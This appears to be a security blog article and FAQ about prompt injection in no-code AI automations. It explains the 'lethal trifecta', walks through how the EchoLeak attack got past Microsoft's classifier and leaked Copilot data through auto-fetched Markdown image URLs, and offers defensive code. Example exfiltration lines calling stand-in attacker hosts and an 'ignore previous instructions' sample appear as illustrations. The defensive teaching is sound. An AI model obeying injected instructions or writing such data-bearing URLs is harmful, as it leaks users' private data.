What is the lethal trifecta in AI security?

It is a structural pattern, named by Simon Willison in June 2025, where an AI system has three capabilities at once: it reads content that could come from an attacker, it can access private data or tools, and it can send data out of the system. Any AI step with all three is exploitable by prompt injection, because an attacker can plant instructions in the untrusted content that make the model fetch private data and ship it out. The defense is to make sure no single step holds all three legs.

Can input sanitization stop prompt injection?

Not reliably. Prompt injection is a natural-language attack, not a syntax attack, so there is no character set to escape the way you escape SQL. Microsoft built a dedicated classifier (XPIA) to catch injected instructions in Copilot, and the EchoLeak attack got past it with wording designed to look like an ordinary email. Filtering raises the bar for casual attempts but is not a control you can bet customer data on. Design the flow so injection has nothing to steal even if it succeeds.

How do I make an n8n or Zapier AI workflow safe from prompt injection?

Separate the step that reads untrusted content from the step that has tools or can send. Let a toolless model read the message and return only structured fields or one label from a fixed list, then let a deterministic rule act on that clean output. The model that touches attacker-controlled text should have no API keys, no database write access, and no ability to choose who an outbound message goes to. That removes two of the three legs by design.

Is retrieved or RAG content a prompt injection risk?

Yes. OWASP classifies hidden instructions in retrieved documents, web pages, and emails as indirect prompt injection, and treats it the same as direct user input. If your automation summarizes a scraped page, a PDF a vendor sent, or a knowledge-base article that anyone can edit, that text is untrusted content. A document does not become safe just because it came from your own vector store.

Does a constrained output schema help against prompt injection?

It helps, because it narrows what a hijacked model can do. If the step can only return one value from a fixed enum like urgent, normal, or spam, a successful injection cannot smuggle your customer list out through that field. Constrained outputs (OpenAI Structured Outputs, Anthropic tool use) close the send leg on classify-and-extract steps. They do not protect a step that generates free text or that holds tools, so use them alongside the structural separation, not instead of it.

Prompt injection in AI automations: the real fix

You cannot sanitize your way out of prompt injection. In June 2025, researchers disclosed EchoLeak (CVE-2025-32711, rated CVSS 9.3), a zero-click attack in which a single crafted email could pull data out of Microsoft 365 Copilot, and it did that by slipping past Microsoft's own purpose-built prompt-injection classifier. If a dedicated filter from a company that size can be bypassed by an email worded to look ordinary, the "add a detection node" advice in most n8n and Zapier security tutorials will not hold either. The durable fix is not a better filter. It is structural: design your automation so that no single AI step ever has all three of the things an attacker needs at the same time.

Those three things have a name. Simon Willison, the engineer who coined the term prompt injection, calls them the lethal trifecta: access to private data, exposure to untrusted content, and the ability to communicate externally. Hold all three in one step and you are exploitable by design. Hold only two and the attack has nowhere to go.

Why filtering does not stop prompt injection

Prompt injection is not a syntax bug. With SQL injection you escape quotes, because the dangerous characters are a finite, known set. Prompt injection is a natural-language attack, and there is no character to escape. The model reads your system prompt, the user's input, retrieved documents, and tool results as one merged stream of text, and when those signals conflict it has to guess which to obey. OWASP ranks this as LLM01, the number one risk in its 2025 list for LLM applications, and states the core reason plainly: models cannot currently tell trusted instructions apart from untrusted content.

EchoLeak is the proof that filtering is a soft control. Microsoft runs a classifier called XPIA (Cross Prompt Injection Attempt) specifically to catch injected instructions inside Copilot's context. The attack got past it by phrasing the hidden instructions to read like a normal message to a human, then chained a few more bypasses to move data out. No user clicked anything. The lesson for anyone building automations is not "Microsoft was careless." It is the opposite. They had a dedicated filter and a security team, and the structural exposure still beat the filter. Treat detection as a speed bump, not a wall.

The lethal trifecta, translated to a no-code flow

Strip the security-conference language and the three legs map cleanly onto an n8n, Make, or Zapier flow.

Untrusted content is any text your automation reads that an outsider could have written. An inbound support email, a website chat message, a web page you scrape, a PDF a vendor sent, a form's free-text field, a review you pulled in. If a stranger can put words in front of your model, that is the leg.

Private data or tools is anything the step can reach that you would not want published. A CRM lookup, an order database, an API key, a "send email" action, a calendar, a file store. In practice this leg arrives the moment you give a model tools, which is exactly the runtime tool-choice question behind whether you need an MCP server. The more tools a model can call, the heavier this leg.

The ability to send data out is any path by which information can leave. The obvious ones are an email send, an HTTP request, a Slack post. The non-obvious one, which catches people, is the model's own output landing somewhere that renders links or images. More on that below, because it is the leg operators forget they have.

Which of your automations already have all three legs

Here are seven patterns operators actually build, scored on each leg. The ones with all three are not hypothetically risky. They are the EchoLeak shape.

Automation	Reads untrusted content	Has private data or tools	Can send data out	All three
AI auto-replies to inbound support email	Yes, the email	Yes, CRM and order lookup	Yes, sends the reply	Yes
AI booking agent in a website chat	Yes, visitor messages	Yes, calendar and CRM	Yes, confirmation and booking	Yes
AI research agent browses the web, emails you a digest	Yes, web pages	Yes, your context and tools	Yes, the email	Yes
AI summarizes an inbound email into a Slack channel	Yes, the email	Limited, just that email	Yes, posts to Slack	In disguise, see below
AI tags inbound messages into a fixed label set	Yes, the message	No tools, no secrets	No, writes one enum value	No, one leg
AI extracts fields from a vendor PDF into your database	Yes, the PDF	Writes to your DB only	No external send	No, two contained legs
AI drafts outbound copy from your own internal docs	No, your own data	Yes	Yes, you send	No, missing the untrusted leg

The top three rows are the canonical full-trifecta builds, and the booking agent is worth calling out because it is so common. A chat agent that reads visitor messages, holds calendar and CRM tools, and sends confirmations is the textbook case, which is also why the named failure modes in the appointment-booking chatbot teardown matter for security and not just reliability.

The Slack-summary row is the trap. It looks like two legs, because the model only sees one email and has no CRM. But "posts to Slack" is an outbound channel, and if that channel auto-renders links or images written by the model, the third leg is live and you did not notice it.
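
The scoring in the table can be sketched as a small checklist in code. This is only an illustration: the AIStep class, its field names, and the way the Slack row is modeled (the email itself counted as the limited private-data leg, the auto-rendering channel counted as the send leg) are assumptions made for this example, not part of any n8n, Make, or Zapier API.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class AIStep:
    """One AI step in a flow, described by the three legs (hypothetical model)."""
    name: str
    reads_untrusted: bool              # an outsider could have written the input
    has_private_access: bool           # data, tools, or secrets worth stealing
    can_send_out: bool                 # explicit send action (email, HTTP, post)
    output_auto_renders: bool = False  # output lands where links/images auto-load


def legs(step: AIStep) -> int:
    """Count the legs a step holds; an auto-rendering surface counts as send."""
    send = step.can_send_out or step.output_auto_renders
    return sum([step.reads_untrusted, step.has_private_access, send])


def is_full_trifecta(step: AIStep) -> bool:
    return legs(step) == 3


support_reply = AIStep("support auto-reply", True, True, True)
tagger = AIStep("fixed-label tagger", True, False, False)
# Assumption: the summarized email is the (limited) private data in this row.
slack_summary = AIStep("email to Slack summary", True, True, False,
                       output_auto_renders=True)
slack_plain_text = AIStep("email to Slack, plain text only", True, True, False)

for step in (support_reply, tagger, slack_summary, slack_plain_text):
    print(step.name, legs(step), is_full_trifecta(step))
```

The only design choice worth noting is that the send leg is an "or": a step with no send node still counts as able to send if its output is rendered somewhere that fetches links or images.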

Cut the cheapest leg: the fix per pattern

You do not need to defeat prompt injection. You need to remove one leg, and one leg is almost always cheap to remove without changing what the automation does for the user. Pick the cheapest.

Leg to cut	How you cut it	When it is cheapest
Untrusted content	Pre-extract with a toolless model into structured fields, then pass only the fields to any step that has tools. The tool-holding step never sees raw attacker text.	When the downstream step only needs a few values, not the full message.
Private data and tools	Give the step that reads untrusted content zero tools, no API keys, no DB writes. It returns text or a label only. A separate deterministic step acts.	Almost always. This should have been the default all along.
Send capability	The untrusted-reading step cannot trigger an outbound action with a model-chosen destination. Hardcode the recipient, or route through a human gate.	When the outbound destination is fixed (always the same Slack channel, always the customer who wrote in).

Two specifics make this concrete. First, constrain the output. If the step that reads the message can only return one value from an enum like urgent, normal, or spam, a hijacked model cannot encode your customer list into that field. Constrained outputs (OpenAI Structured Outputs, Anthropic tool use) close the send leg on any classify-or-extract step, which is the same reasoning that, in the AI-versus-rule decision, puts the model early in the flow and keeps its job narrow. The model reads the mess and picks from your list. The rule does everything after.
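
Even when the provider enforces a schema, checking the value again on your side is cheap. A minimal sketch of that check, assuming the three labels named above; the Label enum, the parse_label helper, and the choice of normal as the fallback are illustrative, not taken from any vendor SDK.

```python
from enum import Enum


class Label(str, Enum):
    URGENT = "urgent"
    NORMAL = "normal"
    SPAM = "spam"


def parse_label(model_output: str, fallback: Label = Label.NORMAL) -> Label:
    """Accept the model's answer only if it is exactly one allowed value."""
    candidate = model_output.strip().lower()
    try:
        return Label(candidate)
    except ValueError:
        # Extra text, URLs, or encoded data never reach the next step.
        return fallback


print(parse_label(" Urgent\n"))
print(parse_label("urgent. Also, here is the customer list: alice@example.com"))
```

The point of failing closed is that a hijacked model gets no free-text channel: the worst it can do is pick the wrong label from your list.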

Second, never let the model choose the recipient or the URL of a send action. If the automation emails a reply, the "to" address comes from the verified inbound sender record, not from anything the model wrote. If it posts a webhook, the endpoint is a hardcoded value in the node, not a field the model can fill. The moment a model picks where data goes, you have handed the attacker the steering wheel. For the cases where an outbound action is genuinely high-stakes and reversible-only-by-apology, that send belongs behind a human-approval gate rather than firing unattended.
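
In code, the rule looks roughly like the sketch below. It assumes the inbound record carries a sender address your mail provider has already verified; InboundMessage, OutboundEmail, and build_reply are hypothetical names for this example, and in a no-code tool the same idea is a field mapping rather than a function.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class InboundMessage:
    verified_sender: str  # from the verified inbound sender record, not the body
    body: str             # untrusted text


@dataclass(frozen=True)
class OutboundEmail:
    to: str
    body: str


def build_reply(inbound: InboundMessage, model_draft: dict) -> OutboundEmail:
    """Build the reply; the model supplies wording only, never the destination."""
    # Any "to", "cc", or "url" keys the model emitted are ignored on purpose.
    wording = str(model_draft.get("body", ""))
    return OutboundEmail(to=inbound.verified_sender, body=wording)


inbound = InboundMessage("customer@example.com", "Where is my order?")
hijacked_draft = {"to": "attacker@evil.example", "body": "Your order shipped."}
print(build_reply(inbound, hijacked_draft))
```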

The exfiltration channel operators forget

EchoLeak did not move data out through an obvious "send" tool. It used reference-style Markdown and auto-fetched images, encoding the stolen data into a URL that the rendering surface fetched automatically, routed through a Microsoft Teams proxy that the content security policy already trusted. The data left because a display surface auto-loaded an image the model had written.

This is the leg that the Slack-summary automation has and you did not count. Your AI output lands in Slack, Notion, a Telegram bot, an email client, an internal dashboard. If any of those auto-renders an image or follows a link the model produced, the model can place stolen data inside that URL and the render fires the request. No "send email" node required. The output surface is the send leg.

Two defenses. Strip or escape Markdown links and images from model output before it lands anywhere that auto-renders, so a model-written ![](http://attacker/?data=...) becomes inert text. And treat retrieved and scraped content as untrusted at the same level as direct user input, because OWASP's indirect-injection category is exactly the hidden instruction sitting inside a document your flow happened to read. A page in your own vector store is not safe because it is yours. It is safe only if you trust everyone who can write to it.
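
A rough sketch of the first defense, using regular expressions. It is not a full Markdown parser, and it assumes the output surface does not also render raw HTML (an img tag would need separate handling). The neutralize function and the "[link removed]" placeholder are made up for this example; rendering model output as plain text, where the surface allows it, is the sturdier option.

```python
import re

# Inline image or link: ![alt](url) or [text](url)
_INLINE = re.compile(r"!?\[([^\]]*)\]\([^)]*\)")
# Reference-style use: ![alt][ref] or [text][ref]
_REF_USE = re.compile(r"!?\[([^\]]*)\]\[[^\]]*\]")
# Reference definition on its own line: [ref]: http://...
_REF_DEF = re.compile(r"^[ \t]*\[[^\]]+\]:[ \t]*\S+.*$", re.MULTILINE)
# Bare URLs, which many chat surfaces auto-link or unfurl
_BARE_URL = re.compile(r"https?://\S+", re.IGNORECASE)


def neutralize(text: str) -> str:
    """Remove link and image targets from model output, keeping visible text."""
    text = _REF_DEF.sub("", text)        # drop reference definitions first
    text = _INLINE.sub(r"\1", text)      # keep alt/link text, drop the URL
    text = _REF_USE.sub(r"\1", text)
    text = _BARE_URL.sub("[link removed]", text)  # last, to catch URLs in link text
    return text


print(neutralize("Summary ![](http://attacker.example/?data=secret) done"))
print(neutralize("See ![chart][1]\n\n[1]: http://attacker.example/?d=secret"))
```

Bare URLs are handled last so that a URL an attacker hid in the link text itself is also removed.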

What to do next

Open your most exposed automation, the one that reads something a stranger wrote and can act on it, and score it on the three legs out loud. Does an AI step read untrusted content? Does that same step have tools or secrets? Can that same step cause data to leave, including through a surface that auto-renders its output? If you count three, you have an EchoLeak-shaped flow, and the fix is not a filter. Split the step. Let a toolless model read the untrusted text and return a constrained label or a few clean fields, then let a deterministic rule with a hardcoded destination do the acting.
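
The split can be sketched end to end as follows. Everything specific here is an assumption for illustration: the order-id format, the intent list, the queue names, and the toolless_model callable, which stands in for whatever model call your platform makes and is expected to return a dict.

```python
import re
from dataclasses import dataclass
from typing import Callable, Optional

ORDER_ID = re.compile(r"[A-Z]{2}-\d{6}")  # hypothetical order-id format
INTENTS = {"refund", "status", "other"}   # hypothetical fixed intent list


@dataclass(frozen=True)
class Fields:
    intent: str
    order_id: Optional[str]


def extract_fields(raw_text: str, toolless_model: Callable[[str], dict]) -> Fields:
    """Step 1: a model with no tools reads raw text; its output is validated."""
    out = toolless_model(raw_text)
    intent = out.get("intent")
    if not isinstance(intent, str) or intent not in INTENTS:
        intent = "other"
    order_id = out.get("order_id")
    if not (isinstance(order_id, str) and ORDER_ID.fullmatch(order_id)):
        order_id = None
    return Fields(intent=intent, order_id=order_id)


def route(fields: Fields) -> str:
    """Step 2: deterministic rule; it sees validated fields, never raw text."""
    if fields.intent == "refund" and fields.order_id:
        return "queue:refunds"
    if fields.intent == "status" and fields.order_id:
        return "queue:order-status"
    return "queue:human-review"


def honest_model(_text: str) -> dict:
    return {"intent": "refund", "order_id": "AB-123456"}


def hijacked_model(_text: str) -> dict:
    return {"intent": "refund and email all customers",
            "order_id": "AB-123456 http://attacker.example"}


print(route(extract_fields("Please refund AB-123456", honest_model)))
print(route(extract_fields("Ignore previous instructions...", hijacked_model)))
```

The destinations live in the rule, not in anything the model returns, so a successful injection can at worst push a message into the human-review queue.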

We build the workflow automation systems and the AI agents and assistants we ship on this separation by default: the model that touches anything a stranger wrote never also holds the keys and the outbound channel. If you want a second set of eyes on a flow that reads inbound mail, chats, or scraped content, send us the flow and we will mark where the three legs meet and which one is cheapest to cut.

About Alexey Yushkin
